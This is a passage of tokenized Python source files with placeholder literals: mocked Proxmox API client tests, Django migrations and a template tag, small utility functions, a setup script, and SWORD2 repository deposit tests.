<s> __author__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> __licence__ = '<STR_LIT>' <EOL> from mock import patch , MagicMock <EOL> from nose . tools import eq_ , ok_ <EOL> from proxmoxer import ProxmoxAPI <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_https_connection ( req_session ) : <EOL> response = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> req_session . request . return_value = response <EOL> ProxmoxAPI ( '<STR_LIT>' , user = '<STR_LIT>' , password = '<STR_LIT>' , port = <NUM_LIT> , verify_ssl = False ) <EOL> call = req_session . return_value . request . call_args [ <NUM_LIT:1> ] <EOL> eq_ ( call [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> eq_ ( call [ '<STR_LIT:data>' ] , { '<STR_LIT:username>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } ) <EOL> eq_ ( call [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( call [ '<STR_LIT>' ] , False ) <EOL> class TestSuite ( ) : <EOL> proxmox = None <EOL> serializer = None <EOL> session = None <EOL> @ patch ( '<STR_LIT>' ) <EOL> def setUp ( self , session ) : <EOL> response = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> session . request . return_value = response <EOL> self . proxmox = ProxmoxAPI ( '<STR_LIT>' , user = '<STR_LIT>' , password = '<STR_LIT>' , port = <NUM_LIT> , verify_ssl = False ) <EOL> self . serializer = MagicMock ( ) <EOL> self . session = MagicMock ( ) <EOL> self . session . request . return_value . status_code = <NUM_LIT:200> <EOL> self . proxmox . _store [ '<STR_LIT>' ] = self . session <EOL> self . proxmox . _store [ '<STR_LIT>' ] = self . serializer <EOL> def test_get ( self ) : <EOL> self . proxmox . nodes ( '<STR_LIT>' ) . storage ( '<STR_LIT>' ) . get ( ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT:GET>' , '<STR_LIT>' ) ) <EOL> def test_delete ( self ) : <EOL> self . proxmox . nodes ( '<STR_LIT>' ) . openvz ( <NUM_LIT:100> ) . delete ( ) <EOL> eq_ ( self . session . request . 
call_args [ <NUM_LIT:0> ] , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . proxmox . nodes ( '<STR_LIT>' ) . openvz ( '<STR_LIT>' ) . delete ( ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_post ( self ) : <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz . create ( vmid = <NUM_LIT> , <EOL> ostemplate = '<STR_LIT>' , <EOL> hostname = '<STR_LIT:test>' , <EOL> storage = '<STR_LIT>' , <EOL> memory = <NUM_LIT> , <EOL> swap = <NUM_LIT> , <EOL> cpus = <NUM_LIT:1> , <EOL> disk = <NUM_LIT:4> , <EOL> password = '<STR_LIT>' , <EOL> ip_address = '<STR_LIT>' ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT:POST>' , '<STR_LIT>' ) ) <EOL> ok_ ( '<STR_LIT:data>' in self . session . request . call_args [ <NUM_LIT:1> ] ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:4> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT:test>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT:password>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz . post ( vmid = <NUM_LIT> , <EOL> ostemplate = '<STR_LIT>' , <EOL> hostname = '<STR_LIT>' , <EOL> storage = '<STR_LIT>' , <EOL> memory = <NUM_LIT> , <EOL> swap = <NUM_LIT> , <EOL> cpus = <NUM_LIT:2> , <EOL> disk = <NUM_LIT:8> , <EOL> password = '<STR_LIT>' , <EOL> ip_address = '<STR_LIT>' ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT:POST>' , '<STR_LIT>' ) ) <EOL> ok_ ( '<STR_LIT:data>' in self . session . request . call_args [ <NUM_LIT:1> ] ) <EOL> data = self . 
session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:8> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT:password>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_put ( self ) : <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz ( <NUM_LIT> ) . config . set ( cpus = <NUM_LIT:4> , memory = <NUM_LIT> , ip_address = '<STR_LIT>' , onboot = True ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:4> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , True ) <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz ( <NUM_LIT> ) . config . put ( cpus = <NUM_LIT:2> , memory = <NUM_LIT> , ip_address = '<STR_LIT>' , onboot = False ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , False ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . TextField ( blank = True , default = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> def migrate_invoiced ( apps , schema_editor ) : <EOL> """<STR_LIT>""" <EOL> Event = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Event . objects . filter ( invoiced__isnull = True ) . update ( invoice_status = '<STR_LIT>' ) <EOL> Event . objects . filter ( invoiced = True ) . update ( invoice_status = '<STR_LIT>' ) <EOL> Event . objects . filter ( invoiced = False ) . update ( invoice_status = '<STR_LIT>' ) <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( verbose_name = '<STR_LIT>' , max_length = <NUM_LIT> , default = '<STR_LIT>' , blank = True , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . RunPython ( migrate_invoiced ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> ] </s>
<s> from django import template <EOL> from django . utils . safestring import mark_safe <EOL> register = template . Library ( ) <EOL> @ register . simple_tag <EOL> def assign ( variable ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( variable ) </s>
<s> import math <EOL> import os <EOL> import resource <EOL> import socket <EOL> def add_dicts ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for d in args : <EOL> result . update ( d ) <EOL> result . update ( kwargs ) <EOL> return result <EOL> def raise_file_descriptor_limit ( ) : <EOL> _ , hard_nofile = resource . getrlimit ( resource . RLIMIT_NOFILE ) <EOL> nofile_target = hard_nofile <EOL> if os . geteuid ( ) == <NUM_LIT:0> : <EOL> nofile_target = <NUM_LIT> * <NUM_LIT:64> <EOL> while True : <EOL> try : <EOL> hard_nofile = nofile_target <EOL> resource . setrlimit ( resource . RLIMIT_NOFILE , <EOL> ( nofile_target , hard_nofile ) ) <EOL> except ValueError : <EOL> nofile_target /= <NUM_LIT> <EOL> break <EOL> def is_ipv6 ( addr ) : <EOL> """<STR_LIT>""" <EOL> sockaddrs = socket . getaddrinfo ( addr , None ) <EOL> if any ( [ addr_tuple [ <NUM_LIT:0> ] == socket . AF_INET for addr_tuple in sockaddrs ] ) : <EOL> return False <EOL> return True <EOL> def mean ( iterable ) : <EOL> if not iterable : <EOL> return None <EOL> return sum ( iterable ) / len ( iterable ) <EOL> def uncorrected_stdev ( iterable ) : <EOL> """<STR_LIT>""" <EOL> if not iterable : <EOL> return None <EOL> if len ( iterable ) == <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> iter_mean = mean ( iterable ) <EOL> deltas = [ ( x - iter_mean ) ** <NUM_LIT:2> for x in iterable ] <EOL> variance = float ( sum ( deltas ) ) / len ( iterable ) <EOL> return math . sqrt ( variance ) <EOL> def median ( iterable ) : <EOL> if not iterable : <EOL> return None <EOL> sorted_list = sorted ( iterable ) <EOL> if len ( sorted_list ) % <NUM_LIT:2> == <NUM_LIT:1> : <EOL> return sorted_list [ len ( sorted_list ) / <NUM_LIT:2> ] <EOL> else : <EOL> right_median = sorted_list [ len ( sorted_list ) / <NUM_LIT:2> ] <EOL> left_median = sorted_list [ len ( sorted_list ) / <NUM_LIT:2> - <NUM_LIT:1> ] <EOL> return ( right_median + left_median ) / <NUM_LIT> </s>
<s> from setuptools import setup , find_packages <EOL> import sys , os <EOL> version = '<STR_LIT>' <EOL> try : <EOL> from mercurial import ui , hg , error <EOL> repo = hg . repository ( ui . ui ( ) , "<STR_LIT:.>" ) <EOL> ver = repo [ version ] <EOL> except ImportError : <EOL> pass <EOL> except error . RepoLookupError : <EOL> tip = repo [ "<STR_LIT>" ] <EOL> version = version + "<STR_LIT>" % ( tip . rev ( ) , tip . hex ( ) [ : <NUM_LIT:12> ] ) <EOL> except error . RepoError : <EOL> pass <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = "<STR_LIT>" , <EOL> long_description = """<STR_LIT>""" , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> keywords = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = '<STR_LIT>' , <EOL> url = "<STR_LIT>" , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> from . import TestController <EOL> from sword2 import Connection , Entry , Error_Document , Atom_Sword_Statement , Ore_Sword_Statement <EOL> from sword2 . compatible_libs import etree <EOL> PACKAGE = "<STR_LIT>" <EOL> PACKAGE_MIME = "<STR_LIT>" <EOL> SSS_URL = "<STR_LIT>" <EOL> SSS_UN = "<STR_LIT>" <EOL> SSS_PW = "<STR_LIT>" <EOL> SSS_OBO = "<STR_LIT>" <EOL> class TestConnection ( TestController ) : <EOL> def test_01_get_service_document ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> assert conn . sd != None <EOL> assert conn . sd . parsed == True <EOL> assert conn . sd . valid == True <EOL> assert len ( conn . sd . workspaces ) == <NUM_LIT:1> <EOL> def test_02_get_service_document_on_behalf_of ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> assert conn . sd != None <EOL> assert conn . sd . parsed == True <EOL> assert conn . sd . valid == True <EOL> assert len ( conn . sd . workspaces ) == <NUM_LIT:1> <EOL> def test_03_basic_create_resource_with_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> def test_04_advanced_create_resource_with_package ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . 
get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> """<STR_LIT>""" <EOL> def test_07_basic_create_resource_with_entry ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> def test_08_advanced_create_resource_with_entry ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , <EOL> metadata_entry = e , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . code == <NUM_LIT> <EOL> assert receipt . location != None <EOL> assert receipt . dom is None or receipt . 
parsed == True <EOL> assert receipt . dom is None or receipt . valid == True <EOL> def test_09_basic_retrieve_deposit_receipt ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> assert receipt . location != None <EOL> new_receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> def test_10_advanced_retrieve_deposit_receipt ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> in_progress = True , <EOL> suggested_identifier = "<STR_LIT>" ) <EOL> assert receipt . location != None <EOL> new_receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert new_receipt . code == <NUM_LIT:200> <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> def test_11_basic_retrieve_content_cont_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . 
href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert receipt . cont_iri is not None <EOL> resource = conn . get_resource ( content_iri = receipt . cont_iri ) <EOL> assert resource . code == <NUM_LIT:200> <EOL> assert resource . content is not None <EOL> def test_12_basic_retrieve_content_em_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert receipt . edit_media is not None <EOL> resource = conn . get_resource ( content_iri = receipt . edit_media ) <EOL> assert resource . code == <NUM_LIT:200> <EOL> assert resource . content is not None <EOL> def test_13_advanced_retrieve_content_em_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> packaging = '<STR_LIT>' <EOL> if receipt . packaging is not None and len ( receipt . packaging ) > <NUM_LIT:0> : <EOL> packaging = receipt . packaging [ <NUM_LIT:0> ] <EOL> resource = conn . get_resource ( content_iri = receipt . 
edit_media , packaging = packaging , on_behalf_of = SSS_OBO ) <EOL> assert resource . code == <NUM_LIT:200> <EOL> assert resource . content is not None <EOL> def test_14_error_retrieve_content_em_iri ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , <EOL> error_response_raises_exceptions = False ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> error = '<STR_LIT>' <EOL> response = conn . get_resource ( content_iri = receipt . edit_media , packaging = error ) <EOL> assert response . code == <NUM_LIT> <EOL> assert isinstance ( response , Error_Document ) <EOL> assert response . error_href == "<STR_LIT>" <EOL> def test_15_retrieve_content_em_iri_as_feed ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> assert receipt . edit_media_feed is not None <EOL> response = conn . get_resource ( content_iri = receipt . edit_media_feed ) <EOL> assert response . code == <NUM_LIT:200> <EOL> assert response . content is not None <EOL> dom = etree . fromstring ( response . content ) <EOL> def test_16_basic_replace_file_content ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . 
get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . update ( dr = receipt , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> def test_17_advanced_replace_file_content ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . update ( dr = receipt , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' , <EOL> metadata_relevant = True ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> def test_18_basic_replace_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . 
href , metadata_entry = e ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> new_receipt = conn . update ( dr = receipt , metadata_entry = ne ) <EOL> assert new_receipt . code == <NUM_LIT> or new_receipt . code == <NUM_LIT:200> <EOL> if new_receipt . code == <NUM_LIT> : <EOL> assert new_receipt . dom is None <EOL> if new_receipt . code == <NUM_LIT:200> : <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> def test_19_advanced_replace_metadata ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> e = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> receipt = conn . create ( col_iri = col . href , metadata_entry = e ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> ne = Entry ( title = "<STR_LIT>" , id = "<STR_LIT>" , dcterms_abstract = "<STR_LIT>" , dcterms_identifier = "<STR_LIT>" ) <EOL> new_receipt = conn . update ( dr = receipt , metadata_entry = ne , in_progress = True ) <EOL> assert new_receipt . code == <NUM_LIT> or new_receipt . code == <NUM_LIT:200> <EOL> if new_receipt . code == <NUM_LIT> : <EOL> assert new_receipt . dom is None <EOL> if new_receipt . code == <NUM_LIT:200> : <EOL> assert new_receipt . parsed == True <EOL> assert new_receipt . valid == True <EOL> """<STR_LIT>""" <EOL> def test_22_delete_content ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . 
workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> new_receipt = conn . delete_content_of_resource ( dr = receipt ) <EOL> assert new_receipt . code == <NUM_LIT> <EOL> assert new_receipt . dom is None <EOL> def test_23_basic_add_content_to_resource_single_file ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW ) <EOL> conn . get_service_document ( ) <EOL> col = conn . sd . workspaces [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> with open ( PACKAGE ) as pkg : <EOL> receipt = conn . create ( col_iri = col . href , <EOL> payload = pkg , <EOL> mimetype = PACKAGE_MIME , <EOL> filename = "<STR_LIT>" , <EOL> packaging = '<STR_LIT>' ) <EOL> receipt = conn . get_deposit_receipt ( receipt . location ) <EOL> with open ( PACKAGE ) as pkg : <EOL> new_receipt = conn . add_file_to_resource ( receipt . edit_media , pkg , "<STR_LIT>" , mimetype = PACKAGE_MIME ) <EOL> assert new_receipt . code >= <NUM_LIT:200> and new_receipt . code < <NUM_LIT> <EOL> assert new_receipt . location is not None <EOL> assert new_receipt . location != receipt . edit_media <EOL> def test_24_advanced_add_content_to_resource_single_file ( self ) : <EOL> conn = Connection ( SSS_URL , user_name = SSS_UN , user_pass = SSS_PW , on_behalf_of = SSS_OBO ) <EOL> conn . get_service_document ( ) <EOL> col = conn . 